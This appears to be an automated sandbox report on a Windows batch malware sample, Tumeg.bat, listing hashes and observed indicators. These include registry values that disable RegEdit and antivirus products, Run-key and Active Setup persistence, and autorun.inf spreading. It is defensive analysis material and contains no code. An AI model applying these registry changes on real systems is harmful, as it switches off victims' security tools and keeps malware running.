Analysis
-
max time kernel
267s -
max time network
267s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
22/11/2024, 10:09
Static task
static1
Behavioral task
behavioral1
Sample
Tumeg.bat
Resource
win10ltsc2021-20241023-en
General
-
Target
Tumeg.bat
-
Size
43KB
-
MD5
6fd336e404c820cea27c1ab6f627189c
-
SHA1
f3762bd54aabdf45b086ff6da85aa4fa04a183be
-
SHA256
2e5731639e0f5eed877b8a6efc4f765e0afcf1065f5046f963abcc9df818a163
-
SHA512
fe3c7a22f99ff66aea81c8a74c0ebfb3b2f49baa3757b83fd6d243eb1b9838dce42e82627392b5b3567846d01420b0b70da0ad2e1e1dad952f52b0ac79c249cd
-
SSDEEP
768:58RhJLWEE08AxPzjc5O9tKVA2BCielbMq6ii5qHxAx7K5OpKVA4BHnKbK63Vgjg:589jg
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride = "1" reg.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 9 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 6052 attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation cmd.exe -
Modifies file permissions 1 TTPs 12 IoCs
pid Process 1348 icacls.exe 2484 icacls.exe 4812 icacls.exe 2676 icacls.exe 2728 icacls.exe 2580 icacls.exe 2584 icacls.exe 2748 icacls.exe 3764 icacls.exe 4220 icacls.exe 1824 icacls.exe 3716 icacls.exe -
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 208.67.222.222 Destination IP 208.67.222.222 Destination IP 208.67.222.222 -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\TITLE = "Tumeg doesn't want to upload your files LOL!" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartupScript = "C:\\Windows\\System32\\config\\startup2.bat" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartupScript = "C:\\Windows\\System32\\config\\startup3.bat" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartupScript = "C:\\Windows\\System32\\config\\startup4.bat" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartupScript = "C:\\Windows\\System32\\config\\startup5.bat" reg.exe -
Checks for any installed AV software in registry 1 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Avira reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Avira\ProductEnabled reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Avira\ProductEnabled = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast reg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast\aswidsagenta reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast\aswidsagenta = "0" reg.exe -
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe -
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf attrib.exe File created C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf cmd.exe File opened for modification C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf cmd.exe File opened for modification C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf attrib.exe -
Drops file in System32 directory 14 IoCs
description ioc Process File created C:\Windows\System32\config\startup4.bat cmd.exe File opened for modification C:\Windows\System32\config\msg.vbs cmd.exe File created C:\Windows\System32\config\msg2.vbs cmd.exe File opened for modification C:\Windows\System32\config\startup.bat cmd.exe File opened for modification C:\Windows\System32\config\startup2.bat cmd.exe File opened for modification C:\Windows\System32\config\startup5.bat cmd.exe File opened for modification C:\Windows\System32\config\startup3.bat cmd.exe File created C:\Windows\System32\config\startup5.bat cmd.exe File opened for modification C:\Windows\System32\config\startup4.bat cmd.exe File created C:\Windows\System32\config\regs.reg cmd.exe File created C:\Windows\System32\config\msg.vbs cmd.exe File created C:\Windows\System32\config\startup.bat cmd.exe File created C:\Windows\System32\config\startup2.bat cmd.exe File created C:\Windows\System32\config\startup3.bat cmd.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\49faf4e9-5e20-4d26-8804-5b62963c0811.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241122101144.pma setup.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf attrib.exe File created C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf cmd.exe File opened for modification C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf cmd.exe File opened for modification C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf attrib.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2456 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 5712 reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3700 reg.exe 1448 PING.EXE 3804 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 5956 ipconfig.exe -
Kills process with taskkill 2 IoCs
pid Process 3400 taskkill.exe 2964 taskkill.exe -
Modifies File Icons 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\ProgramData\\Microsoft\\Device Stage\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" reg.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2319007114-3335580451-2147236418-1000\{C7E1DAF5-2D86-4432-AABA-77087C1335FD} msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133741666358165339" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "856" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "856" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000 explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2319007114-3335580451-2147236418-1000\{B943CCCB-81A1-470E-8E6B-D3DD8AE4257B} explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000_Classes\Local 